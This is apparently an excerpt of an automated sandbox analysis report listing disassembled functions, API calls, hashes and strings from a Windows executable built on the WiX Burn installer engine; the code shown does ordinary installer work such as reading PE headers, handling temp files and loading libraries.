                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00405EFD, 00405F89, 004060D9
                                                                                                                                                          • Failed to combine directory and log prefix., xrefs: 00405EEE
                                                                                                                                                          • Failed to create temp file: %ls, xrefs: 0040607F
                                                                                                                                                          • Failed to ensure temp file path exists: %ls, xrefs: 00405F7A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLastLocalSleepTime
                                                                                                                                                          • String ID: $yG$$yG$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$Failed to combine directory and log prefix.$Failed to concatenate the temp folder and log prefix.$Failed to copy temp path to return.$Failed to create temp file: %ls$Failed to ensure temp file path exists: %ls$Failed to get temp folder.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$failed to allocate memory for the temp path
                                                                                                                                                          • API String ID: 1968021109-2923328553
                                                                                                                                                          • Opcode ID: 0834cc44c5fc16194783fc255d62b71c104143b5b8dff40e2aaade7ea0a24b74
                                                                                                                                                          • Instruction ID: b581c5703ef614e97ea617981991a49172d05e13367e62e9fd2470ea9df9083f
                                                                                                                                                          • Opcode Fuzzy Hash: 0834cc44c5fc16194783fc255d62b71c104143b5b8dff40e2aaade7ea0a24b74
                                                                                                                                                          • Instruction Fuzzy Hash: 8481A471E40615ABEB20AB95CC45FEF7AB4EB08710F114137FA05B62D1D27C9D508BA9
                                                                                                                                                          Function 00401121 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 83fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 828 401121-401190 call 406418 831 401192-4011ad CreateFileW 828->831 832 4011af-4011cc call 401641 call 4010b0 call 4091f2 828->832 831->832 838 4011d1-4011d5 832->838 839 4011f3-4011f6 838->839 840 4011d7-4011f0 call 4012a1 838->840 842 4011f8-4011f9 CloseHandle 839->842 843 4011ff-401203 839->843 840->839 842->843 845 401205-401208 call 404128 843->845 846 40120d-40120f 843->846 845->846 848 401211 846->848 849 401214-401224 call 451586 846->849 848->849
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00406418: SetLastError.KERNEL32(00000000,?,?,?), ref: 0040642D
                                                                                                                                                            • Part of subcall function 00406418: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0040643C
                                                                                                                                                            • Part of subcall function 00406418: GetLastError.KERNEL32(?,?,?), ref: 00406446
                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 004011A7
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?, xG8xGPxGhxG,?,cabinet.dll,00000009,?,00000000), ref: 004011F9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$CloseCreateHandleModuleName
                                                                                                                                                          • String ID: xG$ xG8xGPxGhxG$8xG$D:\a\wix\wix\src\burn\stub\stub.cpp$Failed to run application.$PxG$cabinet.dll$comres.dll$hxG$msi.dll$version.dll$wininet.dll
                                                                                                                                                          • API String ID: 875945561-1648032986
                                                                                                                                                          • Opcode ID: f85726a8e27148a2b8588cc1bc1d25474e0074f2f4eec37eb048951f729f2ced
                                                                                                                                                          • Instruction ID: 9d7be30ccfd11834a924bcfa88db5c814f8bdc1a43ee04bb7f2c8dd4e9365501
                                                                                                                                                          • Opcode Fuzzy Hash: f85726a8e27148a2b8588cc1bc1d25474e0074f2f4eec37eb048951f729f2ced
                                                                                                                                                          • Instruction Fuzzy Hash: C1318771D00218ABDB10EFA5DC49FDE7BB8EF08714F91812AF914BA2D1D7785904CBA9
                                                                                                                                                          Function 004C9000 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: D$urlmon.dll$user32.dll
                                                                                                                                                          • API String ID: 0-2923083034
                                                                                                                                                          • Opcode ID: 5e5894942de7e616650e19efdfecf0d8f36ae196b8ad540547fca1c224627e02
                                                                                                                                                          • Instruction ID: edbb5c4d2b5848b5440427d6054734a44d5b3f6abbd36b2b3d3ea23a6f921c5a
                                                                                                                                                          • Opcode Fuzzy Hash: 5e5894942de7e616650e19efdfecf0d8f36ae196b8ad540547fca1c224627e02
                                                                                                                                                          • Instruction Fuzzy Hash: CF123D24D19668DAEB60DB60CC48BDAB276EFA4304F0051DDA10DA7291E77B5FD0CF1A
                                                                                                                                                          Function 004050E3 Relevance: 3.0, APIs: 2, Instructions: 43fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                          • Opcode ID: ae166459c5cf7da1ab5731963cb4613cb55a19944e2e63453550959f56e936f7
                                                                                                                                                          • Instruction ID: 9b5cb363380aea704d6be7c505647f0d50c4cdf5f0cbb647bf2bebaed7910e8a
                                                                                                                                                          • Opcode Fuzzy Hash: ae166459c5cf7da1ab5731963cb4613cb55a19944e2e63453550959f56e936f7
                                                                                                                                                          • Instruction Fuzzy Hash: FF01FE31A005086BCB10EF65DC89E9BB3BCEBC5315F400076F914D7291D6389E8D8F58
                                                                                                                                                          Function 0040F28D Relevance: 89.9, APIs: 24, Strings: 27, Instructions: 688fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 40f28d-40f302 call 452250 * 2 5 40f344-40f34a 0->5 6 40f304-40f30e GetLastError 0->6 9 40f34c 5->9 10 40f34e-40f35e SetFilePointerEx 5->10 7 40f310-40f319 6->7 8 40f31b 6->8 7->8 11 40f322-40f33f call 40129e 8->11 12 40f31d 8->12 9->10 13 40f3a0-40f3b8 ReadFile 10->13 14 40f360-40f36a GetLastError 10->14 30 40fb16-40fb1c call 4012a1 11->30 12->11 15 40f3fa-40f401 13->15 16 40f3ba-40f3c4 GetLastError 13->16 18 40f377 14->18 19 40f36c-40f375 14->19 23 40faf2-40fb14 call 40129e 15->23 24 40f407-40f410 15->24 20 40f3d1 16->20 21 40f3c6-40f3cf 16->21 25 40f379 18->25 26 40f37e-40f39b call 40129e 18->26 19->18 28 40f3d3 20->28 29 40f3d8-40f3f5 call 40129e 20->29 21->20 23->30 24->23 32 40f416-40f428 SetFilePointerEx 24->32 25->26 26->30 28->29 29->30 51 40fb1f-40fb2f call 451586 30->51 37 40f46a-40f485 ReadFile 32->37 38 40f42a-40f434 GetLastError 32->38 39 40f4c7-40f4ce 37->39 40 40f487-40f491 GetLastError 37->40 43 40f441 38->43 44 40f436-40f43f 38->44 49 40f4d4-40f4de 39->49 50 40facc-40faf0 call 40129e 39->50 47 40f493-40f49c 40->47 48 40f49e 40->48 45 40f443 43->45 46 40f448-40f465 call 40129e 43->46 44->43 45->46 46->30 47->48 54 40f4a0 48->54 55 40f4a5-40f4c2 call 40129e 48->55 49->50 56 40f4e4-40f509 SetFilePointerEx 49->56 50->30 54->55 55->30 62 40f54b-40f566 ReadFile 56->62 63 40f50b-40f515 GetLastError 56->63 66 40f5a8-40f5c3 ReadFile 62->66 67 40f568-40f572 GetLastError 62->67 64 40f522 63->64 65 40f517-40f520 63->65 69 40f524 64->69 70 40f529-40f546 call 40129e 64->70 65->64 73 40f605-40f622 SetFilePointerEx 66->73 74 40f5c5-40f5cf GetLastError 66->74 71 40f574-40f57d 67->71 72 40f57f 67->72 69->70 70->30 71->72 80 40f581 72->80 81 40f586-40f5a3 call 40129e 72->81 78 40f664-40f686 ReadFile 73->78 79 40f624-40f62e GetLastError 73->79 75 40f5d1-40f5da 74->75 76 40f5dc 74->76 75->76 82 40f5e3-40f600 call 40129e 76->82 83 40f5de 76->83 88 40f6e8-40f6f2 GetLastError 78->88 89 40f688-40f68a 78->89 85 40f630-40f639 79->85 86 40f63b 79->86 80->81 81->30 82->30 83->82 85->86 94 40f642-40f65f call 40129e 86->94 95 40f63d 86->95 92 40f6f4-40f6fd 88->92 93 40f6ff 88->93 90 40f68b-40f692 89->90 97 40fa96-40faba call 40129e 90->97 98 40f698-40f6a4 90->98 92->93 100 40f701 93->100 101 40f706-40f735 call 40129e call 4012a1 93->101 94->30 95->94 113 40fabf-40faca call 4012a1 97->113 104 40f6b3-40f6bc 98->104 105 40f6a6-40f6ad 98->105 100->101 101->51 110 40f6c2-40f6e6 ReadFile 104->110 111 40fa4d-40fa64 call 40129e 104->111 105->104 109 40f73a-40f741 105->109 116 40f773-40f78a call 4073cd 109->116 117 40f743-40f76e call 40129e 109->117 110->88 110->90 126 40fa69-40fa78 call 4012a1 111->126 113->51 127 40f7bb-40f7d0 SetFilePointerEx 116->127 128 40f78c-40f7b6 call 40129e 116->128 117->113 139 40fa7a 126->139 131 40f7d2-40f7dc GetLastError 127->131 132 40f81b-40f83e ReadFile 127->132 128->30 137 40f7e9 131->137 138 40f7de-40f7e7 131->138 134 40f840-40f84a GetLastError 132->134 135 40f877-40f883 132->135 140 40f857 134->140 141 40f84c-40f855 134->141 143 40f885-40f8a1 call 40129e 135->143 144 40f8a6-40f8aa 135->144 145 40f7f0-40f802 call 40129e 137->145 146 40f7eb 137->146 138->137 142 40fa7d-40fa85 139->142 149 40f859 140->149 150 40f85e-40f875 call 40129e 140->150 141->140 142->51 151 40fa8b-40fa91 call 40758b 142->151 143->126 147 40f8e7-40f8f0 144->147 148 40f8ac-40f8d2 call 40129e 144->148 161 40f807-40f816 call 4012a1 145->161 146->145 155 40f8f2-40f91d call 40129e 147->155 156 40f91f-40f932 call 405811 147->156 168 40f8d7-40f8e2 call 4012a1 148->168 149->150 150->161 151->51 155->168 173 40f950-40f960 156->173 174 40f934-40f946 156->174 161->139 168->142 175 40f962-40f968 173->175 176 40f96a-40f972 173->176 174->173 178 40f983-40f9dd call 4073cd 175->178 179 40f974-40f97c 176->179 180 40f97e-40f981 176->180 183 40fa0e-40fa2f call 4523b0 call 40ef76 178->183 184 40f9df-40fa04 call 40129e 178->184 179->178 180->178 183->142 191 40fa31-40fa43 call 40129e 183->191 184->183 191->111
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004087CC,00000000,004080B0), ref: 0040F304
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F356
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004087CC,00000000,004080B0), ref: 0040F360
                                                                                                                                                          • ReadFile.KERNELBASE(004080B0,004087E8,00000040,?,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F3B0
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004087CC,00000000,004080B0), ref: 0040F3BA
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(004080B0,004080B0,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F420
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F42A
                                                                                                                                                          • ReadFile.KERNELBASE(004080B0,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F47D
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F487
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(004080B0,00408018,00000000,00000000,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F501
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F50B
                                                                                                                                                          • ReadFile.KERNEL32(004080B0,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F55E
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F568
                                                                                                                                                          • ReadFile.KERNEL32(004080B0,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F5BB
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F5C5
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(004080B0,004080B0,00000000,00000000,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F61A
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F624
                                                                                                                                                          • ReadFile.KERNEL32(004080B0,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F67E
                                                                                                                                                          • ReadFile.KERNEL32(004080B0,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F6DE
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F6E8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$Read$Pointer
                                                                                                                                                          • String ID: .wix$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data too short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$Invalid section info, cContainers too large: %u$PE Header from file didn't match PE Header in memory.$burn$d:\a\wix\wix\src\burn\engine\section.cpp$feclient.dll
                                                                                                                                                          • API String ID: 3909885910-126637462
                                                                                                                                                          • Opcode ID: c1eec8764d78f0953d7f79c28b219eb8137ae6fd7fd4f68d3baaa8f7a06c8bce
                                                                                                                                                          • Instruction ID: f97d5f3addba17084108eedf85ef9cad971bfb3f0afee4f8d2368b86cae05ce7
                                                                                                                                                          • Opcode Fuzzy Hash: c1eec8764d78f0953d7f79c28b219eb8137ae6fd7fd4f68d3baaa8f7a06c8bce
                                                                                                                                                          • Instruction Fuzzy Hash: 14220A72A403247BE7309A148D86FAB36A8AF05B54F1141BBBD0CBB6C1D67C9C448F9D
                                                                                                                                                          Function 004091F2 Relevance: 46.0, APIs: 4, Strings: 22, Instructions: 466COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 194 4091f2-4092d3 call 452250 * 2 GetModuleHandleW call 46606b call 401227 call 466304 call 46478a 207 4092d5-4092e2 194->207 208 4092fe-40930f call 408283 194->208 210 4092e4-4092ee call 4012a1 207->210 213 409311-409320 208->213 214 409322-409332 208->214 216 4092f0-4092f9 210->216 213->210 217 409353 214->217 218 409334-40933b 214->218 219 409651-409658 216->219 221 409359-40936c call 40989b CoInitializeEx 217->221 218->217 220 40933d-409351 call 42bbb7 218->220 223 409665-409667 219->223 224 40965a-409660 call 404128 219->224 220->221 232 409395-4093a1 call 46553f 221->232 233 40936e-409390 call 4012a1 221->233 229 409677-4096a3 call 41490b call 41eba3 call 41edb1 223->229 230 409669-409670 223->230 224->223 252 4096a5-4096ad 229->252 253 4096de-4096e5 229->253 230->229 234 409672 call 419e57 230->234 242 4093a3-4093b0 232->242 243 4093c4-4093d8 call 46bf91 call 467873 232->243 233->216 234->229 245 4093b5-4093bf call 4012a1 242->245 264 4093da-4093ec 243->264 265 4093ee-4093fd call 46a557 243->265 245->216 252->253 257 4096af-4096b2 252->257 255 4096e7-4096e9 253->255 256 40970a-409711 253->256 259 4096eb-4096ed 255->259 260 4096ef 255->260 261 409713-409717 256->261 262 40972b-409737 call 465e0a 256->262 257->253 263 4096b4-4096d8 call 41a285 call 409885 257->263 266 4096f1-409708 call 4196cb call 409885 259->266 260->266 267 409719 261->267 268 40971b-409728 call 409885 261->268 277 409739-409740 262->277 278 40975e-409765 262->278 263->253 264->245 279 409413-409422 call 46b53b 265->279 280 4093ff-409411 265->280 266->262 267->268 268->262 277->278 284 409742-40975c call 41b1ed 277->284 286 409796 278->286 287 409767-409783 call 409885 call 408525 278->287 296 409424-409436 279->296 297 40943b-409451 call 4665b2 279->297 280->245 294 40979c-4097a2 284->294 286->294 287->286 311 409785-409791 call 465caa 287->311 299 4097a3 call 42c17d 294->299 296->245 309 409453-409465 297->309 310 40946a-409485 GetNativeSystemInfo 297->310 300 4097a8-4097af 299->300 303 4097b1-4097bc call 424bd4 300->303 304 4097be-4097da call 422399 call 4662d8 300->304 318 409813-409819 303->318 329 4097fb-4097ff 304->329 330 4097dc-4097ee call 4663a6 304->330 309->245 314 409487-40948a 310->314 315 4094ab 310->315 311->286 320 4094a4-4094a9 314->320 321 40948c-40948f 314->321 317 4094b0-4094fc call 406418 call 409885 315->317 345 409510-409517 call 422c5c 317->345 346 4094fe-409509 call 404128 317->346 323 40981a call 408f7d 318->323 320->317 325 409491-409494 321->325 326 40949d-4094a2 321->326 328 40981f-409826 323->328 325->317 331 409496-40949b 325->331 326->317 333 409828 call 46bd4c 328->333 334 40982d-409834 328->334 336 409801 329->336 337 409803-409810 call 409885 329->337 330->329 350 4097f0-4097f6 call 404128 330->350 331->317 333->334 341 409836 call 46ab77 334->341 342 40983b-409842 334->342 336->337 337->318 341->342 348 409844 call 4684d0 342->348 349 409849-409850 342->349 361 40951c-409520 345->361 346->345 348->349 355 409852-409857 call 46c05b call 465697 349->355 356 40985c-40985e 349->356 350->329 355->356 358 409860 CoUninitialize 356->358 359 409866-409882 call 401271 call 4663d0 call 451586 356->359 358->359 364 409522-40952f 361->364 365 409539-409542 361->365 364->365 366 409613-40962a call 408b53 365->366 367 409548-40954b 365->367 382 409643-40964f 366->382 383 40962c-409639 366->383 370 409551-409554 367->370 371 4095dd-4095fa call 408874 367->371 375 409556-409559 370->375 376 4095ad-4095c4 call 408adf 370->376 371->382 386 4095fc-409609 371->386 380 409577-409590 call 408e52 375->380 381 40955b-40956d 375->381 376->382 391 4095c6-4095d3 376->391 380->382 392 409596-4095a3 380->392 381->380 382->219 383->382 386->366 391->371 392->376
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040929D
                                                                                                                                                            • Part of subcall function 0046606B: InitializeCriticalSection.KERNEL32(004B2588,?,004092A9,00000000,?,?,?,?,?,?), ref: 00466082
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,?,?,00000000,?,?,00000003,00000000,004080B0,00000000,?,?,?,?,?), ref: 00409362
                                                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?), ref: 00409476
                                                                                                                                                            • Part of subcall function 00406418: SetLastError.KERNEL32(00000000,?,?,?), ref: 0040642D
                                                                                                                                                            • Part of subcall function 00406418: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0040643C
                                                                                                                                                            • Part of subcall function 00406418: GetLastError.KERNEL32(?,?,?), ref: 00406446
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorInitializeLastModule$CriticalFileHandleInfoNameNativeSectionSystem
                                                                                                                                                          • String ID: xG8xGPxGhxG$5.0.0+41e11442b2ca93e444b60213b5ae99dcbab787d8$ARM$ARM64$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run elevated mode.$Failed to run embedded mode.$Failed to run normal mode.$Invalid run mode.$d:\a\wix\wix\src\burn\engine\engine.cpp$unknown architecture$x64$x86
                                                                                                                                                          • API String ID: 3064534873-1295423453
                                                                                                                                                          • Opcode ID: 80bb65c861729b14a91656232008abeb9c05e07448eab37c2aeccbbcdcc12b4b
                                                                                                                                                          • Instruction ID: 0e6cde0659f409a751ac756052768a7588cd8fc235680f47554dd2785a81a8c1
                                                                                                                                                          • Opcode Fuzzy Hash: 80bb65c861729b14a91656232008abeb9c05e07448eab37c2aeccbbcdcc12b4b
                                                                                                                                                          • Instruction Fuzzy Hash: A4F1B971E41329A6DB31AA618C46FEE7664AB44704F1540FBF908B62C3DB7C5E808FD9
                                                                                                                                                          Function 00470771 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 236registrylibraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 393 470771-47079a call 4018a4 396 47079c-4707b5 call 4012a1 393->396 397 4707ba-4707d2 GetProcAddress 393->397 404 4709d4-4709d8 396->404 399 47085f-47087f call 467b58 397->399 400 4707d8-4707ec GetCurrentProcess call 466e6b 397->400 409 470892-470894 399->409 410 470881-470887 399->410 411 4707ff-470803 400->411 412 4707ee-4707fa 400->412 407 4709e7-4709eb 404->407 408 4709da-4709e3 RegCloseKey 404->408 413 4709f5-4709f9 407->413 414 4709ed-4709f0 call 404128 407->414 408->407 416 470896-470898 409->416 410->409 415 470889-470890 410->415 411->399 418 470805-470817 call 46d2f8 411->418 417 4709b3-4709c0 call 4012a1 412->417 414->413 415->416 421 4708ab-4708ad 416->421 422 47089a-4708a6 416->422 429 4709d2-4709d3 417->429 431 47082a-47083c call 407535 418->431 432 470819-470825 418->432 425 4708b3-4708c8 call 470680 421->425 426 470971-470983 call 46d2f8 421->426 422->417 436 4708db-4708de 425->436 437 4708ca-4708d6 425->437 439 470985-470991 426->439 440 470993-4709a5 call 407535 426->440 429->404 443 47084f-47085d 431->443 444 47083e-47084a 431->444 432->417 441 470915-470921 call 470680 436->441 442 4708e0-4708f2 call 407535 436->442 437->417 439->417 450 4709a7-4709b1 440->450 451 4709c2-4709d0 440->451 452 470926-47092a 441->452 453 470905-470913 442->453 454 4708f4-470900 442->454 443->399 444->417 450->417 451->429 455 47092c-470938 452->455 456 47093a-47093d 452->456 453->441 454->417 455->417 456->426 457 47093f-470951 call 407535 456->457 460 470953-47095f 457->460 461 470961-47096f 457->461 460->417 461->426
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004707C4
